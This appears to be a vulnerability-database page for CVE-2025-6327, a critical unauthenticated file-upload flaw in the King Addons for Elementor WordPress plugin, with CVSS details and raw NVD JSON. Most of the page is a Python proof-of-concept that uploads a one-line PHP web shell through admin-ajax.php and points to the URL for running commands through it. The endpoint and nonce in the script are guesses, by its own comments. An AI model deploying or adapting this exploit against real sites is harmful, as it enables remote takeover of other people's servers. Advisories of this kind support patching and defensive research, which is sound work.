Security Vulnerability Report
CVE-2025-6327 CVSS 10.0 CRITICAL

CVE-2025-6327

Published: 2025-11-06 16:16:15
Last Modified: 2026-04-15 00:35:42

Description

Unrestricted Upload of File with Dangerous Type vulnerability in KingAddons.com King Addons for Elementor king-addons allows Upload a Web Shell to a Web Server. This issue affects King Addons for Elementor: from n/a through <= 51.1.36.

CVSS Details

CVSS Score
10.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

King Addons for Elementor <= 51.1.36

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
#!/usr/bin/env python3 """ CVE-2025-6327 PoC - King Addons for Elementor Arbitrary File Upload This PoC demonstrates the file upload vulnerability in King Addons for Elementor plugin. """ import requests import sys import random import string def generate_webshell(): """Generate a simple PHP webshell""" return '<?php system($_GET["cmd"]); ?>' def generate_random_string(length=8): """Generate random string for filename""" return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length)) def exploit_cve_2025_6327(target_url, webshell_filename=None): """ Exploit for CVE-2025-6327 Args: target_url: Target WordPress site URL webshell_filename: Optional custom filename for the webshell Returns: Uploaded file path if successful, None otherwise """ if webshell_filename is None: webshell_filename = f"{generate_random_string()}.php" # The vulnerable endpoint and parameter may vary # This requires reconnaissance to identify the exact upload endpoint upload_endpoint = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php" # Prepare the malicious file files = { 'file': (webshell_filename, generate_webshell(), 'image/jpeg') } # The actual parameter name needs to be identified through testing data = { 'action': 'king_addons_upload_file', 'security': 'nonce_value_here' # Nonce may or may not be required } try: print(f"[*] Attempting to upload webshell to {target_url}") print(f"[*] Filename: {webshell_filename}") # Send the upload request response = requests.post( upload_endpoint, files=files, data=data, timeout=30 ) if response.status_code == 200: print(f"[+] Request sent, check response: {response.text}") return webshell_filename else: print(f"[-] Request failed with status code: {response.status_code}") return None except requests.exceptions.RequestException as e: print(f"[-] Request error: {str(e)}") return None def main(): if len(sys.argv) < 2: print(f"Usage: python3 {sys.argv[0]} <target_url>") print(f"Example: python3 {sys.argv[0]} https://example.com") 
sys.exit(1) target = sys.argv[1] result = exploit_cve_2025_6327(target) if result: print(f"\n[!] Exploitation may have succeeded") print(f"[!] Try accessing: {target}/wp-content/uploads/king-addons/{result}?cmd=whoami") else: print(f"\n[-] Exploitation failed or target not vulnerable") if __name__ == "__main__": main()

References

Raw JSON Data

{"cve": {"id": "CVE-2025-6327", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:16:14.787", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Unrestricted Upload of File with Dangerous Type vulnerability in KingAddons.com King Addons for Elementor king-addons allows Upload a Web Shell to a Web Server.This issue affects King Addons for Elementor: from n/a through <= 51.1.36."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/king-addons/vulnerability/wordpress-king-addons-for-elementor-plugin-51-1-36-arbitrary-file-upload-vulnerability?_s_id=cve", "source": "[email protected]"}]}}